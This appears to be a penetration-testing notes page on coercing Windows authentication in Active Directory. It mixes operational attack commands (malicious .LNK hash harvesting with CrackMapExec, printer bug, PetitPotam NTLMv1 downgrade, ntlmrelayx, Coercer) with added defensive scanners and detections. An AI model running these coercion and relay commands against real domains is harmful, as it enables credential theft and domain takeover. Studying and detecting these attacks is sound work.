
Coercing Authentication

Last updated 2 years ago

Harvest NTLMv2/v1 Hashes with Write Access to Shares

The following example demonstrates performing this attack with CrackMapExec; however, it can also be performed by crafting a custom .LNK file.

1. Enumerate the host's shares

crackmapexec smb $ip -u $username -p $password --shares

2. Create a malicious .LNK file calling back to your Responder.py IP

crackmapexec smb $ip -u $username -p $password -M slinky -o NAME=$share SERVER=$responder_ip

3. After waiting and (hopefully) obtaining several NTLM hashes, clean up the malicious file

crackmapexec smb $ip -u $username -p $password -M slinky -o NAME=$share SERVER=$responder_ip CLEANUP=True

Notes

  • Put an underscore as the first character in the file name (e.g., NAME=_bonus.xlsx) and it will put the file at the top of the directory, making it more likely to render and send a hash to the malicious server.
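From the defender's side, a shortcut planted this way is found by scanning shares for .LNK files whose embedded UNC path points at a host that is not a known file server. The scanner below is an added example, not part of these notes or of CrackMapExec's slinky module: it validates the Shell Link header (HeaderSize 0x4C and the ShellLink CLSID), extracts every UTF-16LE UNC host referenced anywhere in the file body (where the icon location string lives), and flags hosts outside an allowlist plus the leading-underscore naming trick described above. The allowlist, host names and the two sample blobs are constructed for the example; the blobs carry only a header and a string and are not complete shortcuts.

```python
"""Triage .lnk files on a file share for UNC references to hosts outside an allowlist.

Added example for these notes; it is not part of the original page or of CrackMapExec's
slinky module. It checks the Shell Link header (size 0x4C and the ShellLink CLSID) and
then extracts every UTF-16LE UNC path from the file body, which is where a planted
shortcut's icon location lives. The sample blobs are constructed and are not complete
.lnk files.
"""
import re
import struct
import uuid
from pathlib import Path

LNK_HEADER_SIZE = 0x4C
LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")

# \\host\ encoded as UTF-16LE: two backslashes, the host name, one backslash.
UNC_UTF16 = re.compile(rb"(?:\\\x00){2}((?:[A-Za-z0-9._\-]\x00)+)\\\x00")


def is_lnk(data: bytes) -> bool:
    """True if the blob carries a ShellLink header (HeaderSize + LinkCLSID)."""
    if len(data) < LNK_HEADER_SIZE:
        return False
    header_size = struct.unpack_from("<I", data, 0)[0]
    clsid = uuid.UUID(bytes_le=data[4:20])
    return header_size == LNK_HEADER_SIZE and clsid == LNK_CLSID


def unc_hosts(data: bytes) -> set[str]:
    """Host names of all UTF-16LE UNC paths found anywhere in the blob."""
    return {m.group(1).decode("utf-16-le").lower() for m in UNC_UTF16.finditer(data)}


def triage_lnk(name: str, data: bytes, allowed_hosts: set[str]) -> list[str]:
    """Findings for one shortcut; an empty list means nothing suspicious."""
    findings: list[str] = []
    if not is_lnk(data):
        return findings
    if name.startswith("_"):
        findings.append("leading underscore sorts the shortcut to the top of the listing")
    for host in sorted(unc_hosts(data) - {h.lower() for h in allowed_hosts}):
        findings.append(f"references UNC host {host!r} outside the allowlist")
    return findings


def scan_share(root: Path, allowed_hosts: set[str]) -> dict[str, list[str]]:
    """Walk a mounted share and report every .lnk that produced findings."""
    results = {}
    for path in root.rglob("*.lnk"):
        findings = triage_lnk(path.name, path.read_bytes(), allowed_hosts)
        if findings:
            results[str(path)] = findings
    return results


def build_sample_lnk(icon_unc: str) -> bytes:
    """Constructed test blob: a bare ShellLink header followed by a UTF-16LE icon path."""
    header = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID.bytes_le
    return header.ljust(LNK_HEADER_SIZE, b"\x00") + icon_unc.encode("utf-16-le") + b"\x00\x00"


# Constructed samples: a planted shortcut pointing at an unknown host, and a benign one.
ALLOWED_HOSTS = {"fileserver01"}
PLANTED = build_sample_lnk(r"\\10.0.0.99\share\icon.ico")
BENIGN = build_sample_lnk(r"\\fileserver01\public\icon.ico")

if __name__ == "__main__":
    for name, blob in (("_bonus.xlsx.lnk", PLANTED), ("report.lnk", BENIGN)):
        print(name, triage_lnk(name, blob, ALLOWED_HOSTS))
```

Run it against a mounted share with scan_share(Path("/mnt/share"), ALLOWED_HOSTS); a hit on a world-writable share is also a prompt to review the share permissions that let the file be written in the first place.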

The Printer Bug

If a machine that we have compromised is configured with unconstrained delegation, we are able to capture any of the TGTs from machines/accounts that have authenticated to it. If we're able to obtain a TGT from a machine account, we can craft service tickets and obtain administrative access to it - this also works for domain controllers.

It should be noted that in order to successfully exploit the printer bug, we must have already obtained a session as or valid domain user credentials.

Enumerate Print Spooler Service

Enumerate Print Spooler service with ItWasAllADream:

# Enumerate Print Spooler with ItWasAllADream
docker run -it itwasalladream -u $username -p $password -d $domain $target -v

# Enumerate with CrackMapExec
crackmapexec smb $ip -u $username -p $password -M spooler

# Enumerate Print Spooler with Impacket
python rpcdump.py @$target | egrep 'MS-RPRN|MS-PAR'

# SpoolerScan.ps1
.\SpoolerScan.ps1

Exploiting the Printer Bug with SpoolSample.exe

1. We first need to monitor for any new TGTs on the system that has unconstrained delegation configured. Rubeus provides us with the handy functionality to accomplish this:

.\Rubeus.exe monitor /targetuser:$machineaccount /interval:5 /nowrap

2. We can then execute SpoolSample.exe on the host to coerce authentication:

.\SpoolSample.exe $target $attacker

3. After running SpoolSample.exe we should then observe a TGT on the attacker controlled system.

Remotely Exploiting the Printer Bug

Alternatively, we can accomplish this same exploitation path remotely using Impacket's ntlmrelayx to relay the credentials:

# Exploiting the Printerbug with Dementor.py
dementor.py -d $domain -u $username -p $password $attackerip $targetfqdn

# Exploiting the Printerbug with Printerbug.py
python printerbug.py $domain/$username:$password@$targetfqdn $attackerip

# Relay the authentication attempt to the target server
ntlmrelayx.py -smb2support -t smb://$target
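The whole printer bug path depends on one configuration fact: a host other than a domain controller is trusted for unconstrained delegation, and the accounts whose TGTs end up there are not marked as sensitive. The audit below is an added example (not part of these notes, Rubeus or SpoolSample) that decodes the userAccountControl flags to list exactly those hosts and accounts, which is what you want to remediate before any coercion tool can be pointed at them. The flag constants are the documented ADS_UF_* values; the LDAP records are constructed for the example and would normally come from a query returning sAMAccountName and userAccountControl.

```python
"""Audit userAccountControl for unconstrained delegation and for privileged accounts that
can still be delegated.

Added example for the Printer Bug section; it is not part of the original notes, Rubeus or
SpoolSample. The bit values are the ADS_UF_* flags of the userAccountControl attribute. The
records are constructed here; in practice they come from an LDAP query that returns
sAMAccountName and userAccountControl for every user and computer object.
"""
UF_ACCOUNTDISABLE = 0x00000002
UF_NORMAL_ACCOUNT = 0x00000200
UF_WORKSTATION_TRUST_ACCOUNT = 0x00001000
UF_SERVER_TRUST_ACCOUNT = 0x00002000            # domain controller computer account
UF_TRUSTED_FOR_DELEGATION = 0x00080000          # unconstrained delegation
UF_NOT_DELEGATED = 0x00100000                   # "account is sensitive and cannot be delegated"
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x01000000  # constrained delegation with protocol transition

FLAG_NAMES = {
    UF_ACCOUNTDISABLE: "ACCOUNTDISABLE",
    UF_NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
    UF_WORKSTATION_TRUST_ACCOUNT: "WORKSTATION_TRUST_ACCOUNT",
    UF_SERVER_TRUST_ACCOUNT: "SERVER_TRUST_ACCOUNT",
    UF_TRUSTED_FOR_DELEGATION: "TRUSTED_FOR_DELEGATION",
    UF_NOT_DELEGATED: "NOT_DELEGATED",
    UF_TRUSTED_TO_AUTH_FOR_DELEGATION: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}


def uac_flags(uac: int) -> list[str]:
    """Names of the known flags set in a userAccountControl value."""
    return [name for bit, name in FLAG_NAMES.items() if uac & bit]


def delegation_type(uac: int) -> str:
    """Classify the delegation configuration encoded in userAccountControl."""
    if uac & UF_TRUSTED_FOR_DELEGATION:
        return "unconstrained"
    if uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION:
        return "constrained (protocol transition)"
    return "none"


def unconstrained_delegation_findings(records, exempt_dcs=True):
    """Enabled accounts trusted for unconstrained delegation. Domain controllers carry the
    flag by design, so they are skipped unless exempt_dcs=False."""
    findings = []
    for rec in records:
        uac = rec["userAccountControl"]
        if uac & UF_ACCOUNTDISABLE or delegation_type(uac) != "unconstrained":
            continue
        is_dc = bool(uac & UF_SERVER_TRUST_ACCOUNT)
        if is_dc and exempt_dcs:
            continue
        if is_dc:
            kind = "domain controller"
        elif uac & UF_WORKSTATION_TRUST_ACCOUNT:
            kind = "computer"
        else:
            kind = "user"
        findings.append({"name": rec["sAMAccountName"], "kind": kind, "flags": uac_flags(uac)})
    return findings


def unprotected_privileged(records, privileged_names):
    """Privileged accounts not marked 'sensitive and cannot be delegated': their TGTs are
    forwarded to any unconstrained-delegation host they authenticate to."""
    return [rec["sAMAccountName"] for rec in records
            if rec["sAMAccountName"] in privileged_names
            and not rec["userAccountControl"] & UF_NOT_DELEGATED]


# Constructed directory records (hypothetical names, not from any real domain).
SAMPLE_RECORDS = [
    {"sAMAccountName": "DC01$", "userAccountControl": UF_SERVER_TRUST_ACCOUNT | UF_TRUSTED_FOR_DELEGATION},
    {"sAMAccountName": "WEB01$", "userAccountControl": UF_WORKSTATION_TRUST_ACCOUNT | UF_TRUSTED_FOR_DELEGATION},
    {"sAMAccountName": "FILE01$", "userAccountControl": UF_WORKSTATION_TRUST_ACCOUNT},
    {"sAMAccountName": "OLDSRV$", "userAccountControl": UF_WORKSTATION_TRUST_ACCOUNT | UF_TRUSTED_FOR_DELEGATION | UF_ACCOUNTDISABLE},
    {"sAMAccountName": "svc_sql", "userAccountControl": UF_NORMAL_ACCOUNT | UF_TRUSTED_FOR_DELEGATION},
    {"sAMAccountName": "da_admin", "userAccountControl": UF_NORMAL_ACCOUNT},
    {"sAMAccountName": "da_jsmith", "userAccountControl": UF_NORMAL_ACCOUNT | UF_NOT_DELEGATED},
]
PRIVILEGED = {"da_admin", "da_jsmith"}

if __name__ == "__main__":
    for f in unconstrained_delegation_findings(SAMPLE_RECORDS):
        print(f"{f['kind']:>10} {f['name']:<10} {', '.join(f['flags'])}")
    print("privileged but delegable:", unprotected_privileged(SAMPLE_RECORDS, PRIVILEGED))
```

Every non-DC entry the first function returns is a host where Rubeus monitor would see forwarded TGTs; the fix is to clear the flag (or move the service to constrained or resource-based delegation), and the second function lists the privileged accounts that should additionally get the NOT_DELEGATED flag or Protected Users membership so their tickets are never forwarded.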

PetitPotam

While PetitPotam itself has been rendered a little redundant by tools like Coercer, which accomplish the same and more, it is still important to discuss, as it is still all that's needed to compromise a significant amount of Active Directory environments. One of the most simple yet effective attack paths with PetitPotam would look like the following:

1. The tester first identifies all of the domain controllers in the domain. This can be done either through DNS or by identifying common ports associated with DCs, such as 88/tcp.

2. Modify the configuration of your Responder installation so that the challenge parameter is set to the following value, and run Responder in Analyze mode with the --lm flag to attempt to downgrade the authentication:

# Responder Challenge Attribute
1122334455667788

# Run Responder in Analyze mode with the --lm flag
responder -I $interface -A --lm

3. The tester can then attempt to force authentication from the domain controllers to the attacker controlled server using PetitPotam:

python3 PetitPotam.py $listenerip $targetip

4. The output received should look like the following:

[SMB] NTLMv1 Client   : 10.0.0.5
[SMB] NTLMv1 Username : OASIS\PARZDC$
[SMB] NTLMv1 Hash     : PARZDC$::OASIS:FFJSFOE[SNIP]

5. With the NTLMv1 hash now retrieved, the tester can utilize the ntlmv1-multi tool to obtain the appropriate format for cracking:

ntlmv1.py --ntlmv1 PARZDC$::OASIS:FFJSFOE[SNIP]

6. This hash can then be cracked via Hashcat with the instructions displayed on screen, or alternatively can be submitted to crack.sh.
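Both the printer bug and PetitPotam leave the same two traces a defender can alert on: the coerced host opens an RPC named pipe over \\*\IPC$ (spoolss for MS-RPRN, efsrpc or lsarpc for MS-EFSR), which shows up as Security event 5145 when the "Detailed File Share" audit subcategory is enabled on the DC, and a domain controller that answers with NTLMv1 (the downgrade the --lm step relies on) shows up as a 4624 with LmPackageName "NTLM V1" on whichever server received the connection. The detection below is an added example covering both sections; it is not part of these notes or of any tool named on this page. The events are constructed dicts keyed by the Windows event data field names, reusing the OASIS / PARZDC$ / 10.0.0.5 values from the Responder output above; the 10.0.0.50 source and the "jdoe" account are assumptions. The underlying fixes are the usual ones: stop the Print Spooler service on domain controllers, set LmCompatibilityLevel so NTLMv1 is refused, and apply Microsoft's KB5005413 hardening for the PetitPotam relay case.

```python
r"""Detection for authentication coercion and NTLMv1 downgrade over constructed Security events.

Added example for the Printer Bug and PetitPotam sections; not part of the original notes or
of any tool named on this page. Events are dicts keyed by Windows event data field names, as a
SIEM agent would export them. Two signals:
  * 5145 on \\*\IPC$ whose RelativeTargetName is a named pipe used for coercion
    (requires the "Detailed File Share" audit subcategory on the monitored host).
  * 4624 with LmPackageName "NTLM V1": the client negotiated NTLMv1; a machine account ($)
    doing so is exactly what the Responder output above shows.
"""
from collections import Counter

# Named pipes carrying the coercion RPC calls discussed on this page.
COERCION_PIPES = {
    "spoolss": "MS-RPRN (printer bug)",
    "efsrpc": "MS-EFSR (PetitPotam)",
    "lsarpc": "MS-EFSR over lsarpc (PetitPotam)",
}
IPC_SHARE = r"\\*\ipc$"


def detect_pipe_coercion(events):
    """5145 events that open a coercion pipe on the IPC$ share."""
    hits = []
    for e in events:
        if e.get("EventID") != 5145 or e.get("ShareName", "").lower() != IPC_SHARE:
            continue
        pipe = e.get("RelativeTargetName", "").lower()
        if pipe in COERCION_PIPES:
            hits.append({"time": e["TimeCreated"], "host": e["Computer"], "pipe": pipe,
                         "technique": COERCION_PIPES[pipe], "source": e.get("IpAddress"),
                         "account": e.get("SubjectUserName")})
    return hits


def detect_ntlmv1_logons(events):
    """4624 events where the client authenticated with NTLMv1."""
    hits = []
    for e in events:
        if e.get("EventID") != 4624 or e.get("LmPackageName", "").upper() != "NTLM V1":
            continue
        user = e.get("TargetUserName", "")
        hits.append({"time": e["TimeCreated"], "host": e["Computer"], "user": user,
                     "domain": e.get("TargetDomainName"), "source": e.get("IpAddress"),
                     "machine_account": user.endswith("$")})
    return hits


def sources_by_pipe_count(hits):
    """Coercion pipe opens per source IP; one source touching several pipes is the
    pattern of a tool that tries every method in turn."""
    return Counter(h["source"] for h in hits)


# Constructed events. OASIS, PARZDC$ and 10.0.0.5 come from the Responder output above;
# 10.0.0.50, jdoe and FILESRV01 are assumed.
SAMPLE_EVENTS = [
    {"TimeCreated": "2024-01-01T10:00:01", "EventID": 5145, "Computer": "PARZDC.oasis.local",
     "ShareName": r"\\*\IPC$", "RelativeTargetName": "spoolss", "IpAddress": "10.0.0.50",
     "SubjectUserName": "jdoe", "AccessMask": "0x12019f"},
    {"TimeCreated": "2024-01-01T10:00:02", "EventID": 5145, "Computer": "PARZDC.oasis.local",
     "ShareName": r"\\*\IPC$", "RelativeTargetName": "srvsvc", "IpAddress": "10.0.0.20",
     "SubjectUserName": "FILESRV01$", "AccessMask": "0x12019f"},
    {"TimeCreated": "2024-01-01T10:00:03", "EventID": 5145, "Computer": "FILESRV01.oasis.local",
     "ShareName": r"\\*\Finance", "RelativeTargetName": r"Q1\budget.xlsx", "IpAddress": "10.0.0.31",
     "SubjectUserName": "jdoe", "AccessMask": "0x120089"},
    {"TimeCreated": "2024-01-01T10:00:04", "EventID": 5145, "Computer": "PARZDC.oasis.local",
     "ShareName": r"\\*\IPC$", "RelativeTargetName": "efsrpc", "IpAddress": "10.0.0.50",
     "SubjectUserName": "jdoe", "AccessMask": "0x12019f"},
    {"TimeCreated": "2024-01-01T10:00:05", "EventID": 4624, "Computer": "FILESRV01.oasis.local",
     "TargetUserName": "PARZDC$", "TargetDomainName": "OASIS", "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V1", "IpAddress": "10.0.0.5"},
    {"TimeCreated": "2024-01-01T10:00:06", "EventID": 4624, "Computer": "FILESRV01.oasis.local",
     "TargetUserName": "jdoe", "TargetDomainName": "OASIS", "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V2", "IpAddress": "10.0.0.31"},
    {"TimeCreated": "2024-01-01T10:00:07", "EventID": 4624, "Computer": "FILESRV01.oasis.local",
     "TargetUserName": "jdoe", "TargetDomainName": "OASIS", "LogonType": 3,
     "AuthenticationPackageName": "Kerberos", "LmPackageName": "-", "IpAddress": "10.0.0.31"},
]

if __name__ == "__main__":
    for h in detect_pipe_coercion(SAMPLE_EVENTS):
        print(f"{h['time']} {h['host']} {h['pipe']:<8} from {h['source']} as {h['account']}: {h['technique']}")
    for h in detect_ntlmv1_logons(SAMPLE_EVENTS):
        print(f"{h['time']} NTLMv1 logon {h['domain']}\\{h['user']} from {h['source']} on {h['host']}")
```

The spoolss and efsrpc pipes also see legitimate traffic from print clients and EFS users, so the 5145 signal is best scoped to domain controllers and to sources that are not known print or file servers; the NTLMv1 signal has no legitimate baseline once the domain policy refuses v1, so any hit is a policy gap on the authenticating client.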

Trigger NTLM Authentication over HTTP

## https://twitter.com/n00py1/status/1481385989025280000?s=20&t=rMzsQI6ENH2SYVVaTYTqAA
Invoke-WebRequest -UseDefaultCredentials

Coercer

Coercer is a Python script which automatically attempts to coerce an arbitrary machine into authenticating to an attacker controlled device in several ways.

# Basic use of Coercer.py
Coercer.py -d $domain -u $username -p $password --listener $attackerip --target $targetip

References

Active Directory Computer Account SMB Relaying Attack - Praetorian